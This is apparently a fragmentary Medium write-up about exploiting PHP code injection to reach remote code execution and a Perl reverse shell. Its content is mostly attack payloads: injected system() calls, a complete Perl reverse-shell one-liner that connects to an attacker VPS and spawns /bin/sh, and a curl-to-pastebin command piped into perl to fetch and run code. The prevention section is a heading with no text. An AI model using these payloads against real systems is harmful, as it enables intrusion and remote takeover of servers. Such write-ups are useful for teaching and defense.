RCE By Code Injection | Perl Reverse Shell

what is php code injection weakness ?

Background story

no reflacted string
Remote Code Execution

The expected backend code:

$input = $_REQUEST['local'];
$input = $_REQUEST['local'];

Getting Reverse Shell

'.system("nc -v").'
not reflected any data mean not performing the command
found Perl v5.20
funny meme ^_^
perl -e 'use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
request syntax error because [&] sign
'.system("curl -v").'
use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
curl https://pastebin.com/raw/EEaH**** | perl
'.system("curl https://pastebin.com/raw/EEaH**** | perl").'
Reverse Shell via Perl

Prevent PHP code injection

Stay in touch



Cyber Security Engineer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store